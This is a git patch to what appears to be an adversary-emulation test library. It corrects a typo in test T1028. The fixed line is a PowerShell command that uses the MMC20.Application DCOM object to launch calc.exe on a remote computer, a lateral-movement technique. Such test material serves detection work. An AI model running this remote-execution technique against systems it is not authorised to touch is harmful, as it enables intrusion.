From c8520ab1af10b5d4fedc2415b7d20ebc8a6f0778 Mon Sep 17 00:00:00 2001
From: Jeremy Brooks <brooksjeremyc@gmail.com>
Date: Wed, 6 May 2020 12:26:34 -0400
Subject: [PATCH] fix type in T1028 command (#976)

Co-authored-by: Carrie Roberts <clr2of8@gmail.com>
---
 atomics/T1028/T1028.md   | 2 +-
 atomics/T1028/T1028.yaml | 2 +-
 2 files changed, 2 insertions(+), 2 deletions(-)

diff --git a/atomics/T1028/T1028.md b/atomics/T1028/T1028.md
index 43d82678..01e3962c 100644
--- a/atomics/T1028/T1028.md
+++ b/atomics/T1028/T1028.md
@@ -67,7 +67,7 @@ Upon successful execution, cmd will spawn calc.exe on a remote computer.
 
 
 ```powershell
-[activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.application","#{computer_name}")).Documnet.ActiveView.ExecuteShellCommand("c:\windows\system32\calc.exe", $null, $null, "7")
+[activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.application","#{computer_name}")).Document.ActiveView.ExecuteShellCommand("c:\windows\system32\calc.exe", $null, $null, "7")
 ```
 
 
diff --git a/atomics/T1028/T1028.yaml b/atomics/T1028/T1028.yaml
index 32c67e10..4c5eca8e 100644
--- a/atomics/T1028/T1028.yaml
+++ b/atomics/T1028/T1028.yaml
@@ -40,7 +40,7 @@ atomic_tests:
     executor:
       name: powershell
       command: |
-        [activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.application","#{computer_name}")).Documnet.ActiveView.ExecuteShellCommand("c:\windows\system32\calc.exe", $null, $null, "7")
+        [activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.application","#{computer_name}")).Document.ActiveView.ExecuteShellCommand("c:\windows\system32\calc.exe", $null, $null, "7")
 
   - name: WMIC Process Call Create
     description: |